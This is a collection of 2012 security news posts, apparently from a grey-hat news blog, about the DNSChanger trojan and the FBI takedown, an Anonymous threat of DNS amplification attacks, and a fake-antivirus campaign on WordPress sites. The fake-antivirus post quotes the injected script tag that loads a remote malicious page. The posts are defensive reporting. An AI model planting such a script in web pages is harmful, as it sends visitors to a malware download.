No Internet Connection For DNSChanger Victims As FBI Will Shutdown DNSChanger Servers on July 9

No Internet Connection For DNSChanger Victims As FBI Will Shutdown DNSChanger Servers on July 9

Earlier in this year FBI carried out Operation Ghost Click to destroy the DNSChanger network and set up a replacement server which redirected DNS queries from affected computers to their correct destinations. This was a temporary solution, so now the FBI decided the server which is still infecting millions of people is set to be switched off on the 9th of July, I mean this Monday.  This will mean that users who are infected with the malware will be almost completely unable to access the internet normally. Users are therefore advised to check whether their computers or routers use one of the FBI-listed IP addresses for DNS queries, well before the server shutdown, by visiting dnschanger.eu or dns-ok.us. Users who want to check their configuration manually need to look out for the following IP address ranges:-

• 85.255.112.0 to 85.255.127.255
• 67.210.0.0 to 67.210.15.255
• 93.188.160.0 to 93.188.167.255
• 77.67.83.0 to 77.67.83.255
• 213.109.64.0 to 213.109.79.255
• 64.28.176.0 to 64.28.191.255

If an address from one of the above ranges is already set as the DNS server on the computer or router, it is infected with DNSChanger. Users can find out where to locate this DNS server information for their particular case using a wizard set up by the eco association. Future DNS queries can be made using servers such as Google's at 8.8.8.8. 

Although this date and the DNS problem have been public knowledge for several months, there are still thousands of infected computers in use in the UK. Two months ago, the FBI was still registering queries from around 20,000 UK IP addresses. From Monday, users will only be able to visit web sites from infected computers by entering the IP address directly (e.g. http://193.99.144.80 for heise.de). 

-Source (The-H)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">No Internet Connection For DNSChanger Victims As FBI Will Shutdown DNSChanger Servers on July 9"https://www.voiceofgreyhat.com/2012/07/no-internet-connection-for-dnschanger.html</a>

Anonymous Threatened To Bring-down Entire Internet By Attacking DNS

Anonymous Threatened  To Bring-down Entire Internet By Attacking DNS

Infamous Anonymous has threatened  to bring down a substantial portion of the entire Internet by attacking the domain name system (DNS) on March 31, 2012. The attack will be part of protest of FBI recent movement of arresting key members of Lulz & Anon as well as the group confirmed that not only this issue but also the attack has a solid relation over the recent take down of the file-sharing website Megaupload. In short it will be the second phase of Operation Megaupload (#OpMegaupload). You can say its a tit for tat by Anonymous. For your reminder FBI also vows to shutdown the DNSChanger name servers on the 8th of this month.

Anonymous members most likely will employ a relatively little-known technique called DNS amplification, which cleverly tricks mis-configured DNS servers into spewing out torrents of useless data that in turn cause other DNS servers to add to the chaos by producing even more useless data that overwhelms limited traffic-handling capacity. Theoretically, the cascade of out-of-control servers could swamp the ability of the Internet to cope, causing millions of websites to seemingly disappear. The financial fallout from being unable to gain access to the websites of online retailers, banks and other institutions could be enormous. Though experts seriously doubt that Anonymous or another group can credibly reduce the Internet to shambles in the near future, but the longer-term outlook is dimmer.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Anonymous Threatened To Bring-down Entire Internet By Attacking DNS"https://www.voiceofgreyhat.com/2012/03/anonymous-threatened-to-bring-down.html</a>

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected 

More than 200,000 websites with fake anti-virus software, almost 30,000 unique sites has already been compromised with this fake anti-virus exploit. According to computer security group Websense, the exploit, which mostly affects sites built with WordPress, places a short piece of injected code at the bottom of a page:-

</DIV><!--END body=wrapper ==>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY></HTML>

When a user loads the page, they're redirected to a page in the .rr.nu top-level domain that mimics a Windows security scan, then asks them to download a malicious program to supposedly clear viruses from their computer. It's a scam that's been running in various forms for years, and Websense says it's been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.

Earlier in 2011 we have also seen such scenario when 614,000 webpages comromised with mass ASP.NET Infection, also Willysy malware Infects More than 6 Million WeSites, Lilupophilupop Attack took 1 Million+ Web-pages and so on.

-Source (The Verge)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected"https://www.voiceofgreyhat.com/2012/03/fake-antivirus-exploit-more-than-200000.html</a>

FBI Will Shutdown DNSChanger Name Servers On March 8 (Operation Ghost Click)

FBI Will Shutdown DNSChanger Name Servers On March 8 (Operation Ghost Click)

It is widely known to all that the FBI will shut down the DNSChanger name servers on the 8th March, so it can be expected that the Internet connection of many users over the whole spectrum will be hampered during this operation because the trojan named DNSChanger has occupied millions of computers in more than 100 countries. FBI has planned the whole stuff earlier in November 2011 & it was named Operation Ghost Click. What many people do not know is that the clean DNS servers which are operated by the Internet Systems Consortium (ISC) and used to replace the rogues will be shut down on March 8, 2012.[1] From the start, the US District Court for the Southern District of New York permitted the ISC to operate these servers for a period of 120 days.[1]  However, on February 17, 2012 the US government requested this deadline be extended to July 9, 2012.[2]
Barring an extension from the FBI, those systems still infected with DNSChanger will cease receiving DNS services from the ISC controlled name servers on this date.  In other words, they will not be able to properly access internet resources.  This gives information security professionals less than two weeks to detect, locate and remediate any systems on their networks that are still infected. The DNSChanger Working Group (DCWG) estimates there are still approximately 450,000 systems still infected as of January 28, 2012.[3]  Other statistics show that DNSChanger may be present in half of the Fortune 500 companies as well as at least 27 government organizations.[4,5,6] In early February 2012 Internet Identity disclosed there were 3 million systems still infected globally.[5,6]  This is a relatively small number of systems when compared to other virus outbreaks.  Regardless it represents a challenge to security professionals. This can be a substantial undertaking for large enterprises.  The nature of DNSChanger was to redirect infected systems to malicious destinations.  Many of these sites in turn installed additional malware.  By finding a DNSChanger infected system you will be finding a system that has additional infections.[7]  This should justify the need for a thorough sweep for DNSChanger infections. Luckily there are many resources available to detect and remediate DNSChanger infections.  The easiest way is to utilize a network monitoring tool to isolate DNS traffic to the ISC operated DNS resolvers.

The Offending Netblocks Are:[1,8]:-

85.255.112.0/20 (85.255.112.0 through 85.255.127.255)
67.210.0.0/20 (67.210.0.0 through 67.210.15.255)
93.188.160.0/21 (93.188.160.0 through 93.188.167.255)
77.67.83.0/24 (77.67.83.0 through 77.67.83.255)
213.109.64.0/20 (213.109.64.0 through 213.109.79.255)
64.28.176.0/20 (64.28.176.0 through 64.28.191.255)

FBI has published a paper with instructions on how to detect DNSChanger on individual systems.

-Source (FBI, Infosec Island)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">FBI Will Shutdown DNSChanger Name Servers On March 8 (Operation Ghost Click)"https://www.voiceofgreyhat.com/2012/02/fbi-will-shutdown-dnschanger-name.html</a>

DNSChanger Trojan Targeting US Govt Sites

DNSChanger Trojan Targeting US Govt Sites 

Security researcher suspecting that still malware named DNS Changer still targeting US Govt sites. Even researcher said that hundreeds of Govt sites are infected with that particular malware. 

Brief About DNSChanger:- 

The malware, known as the “DNSChanger Trojan,” quietly alters the host computer’s Internet settings to hijack search results and to block victims from visiting security sites that might help scrub the infections. DNSChanger frequently was bundled with other types of malware, meaning that systems infected with the Trojan often also host other, more nefarious digital parasites.

Earlier few guys ware busted for using the Trojan to control more than four million computers in over 100 countries — including an estimated 500,000 in the United States. Investigators timed the arrests with a coordinated attack on the malware’s infrastructure. The two-pronged attack was intended to prevent miscreants from continuing to control the network of hacked PCs, and to give Internet service providers an opportunity to alert customers with infected machines. Computers still infected with DNSChanger are up against a countdown clock. As part of the DNSChanger botnet takedown, the feds secured a court order to replace the Trojan’s DNS infrastructure with surrogate, legitimate DNS servers. But those servers are only allowed to operate until March 8, 2012. Unless the court extends that order, any computers still infected with DNSChanger may no longer be able to browse the Web.

-Source (krebs On Security)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">DNSChanger Trojan Targeting US Govt Sites"https://www.voiceofgreyhat.com/2012/02/dnschanger-trojan-targeting-us-govt.html</a>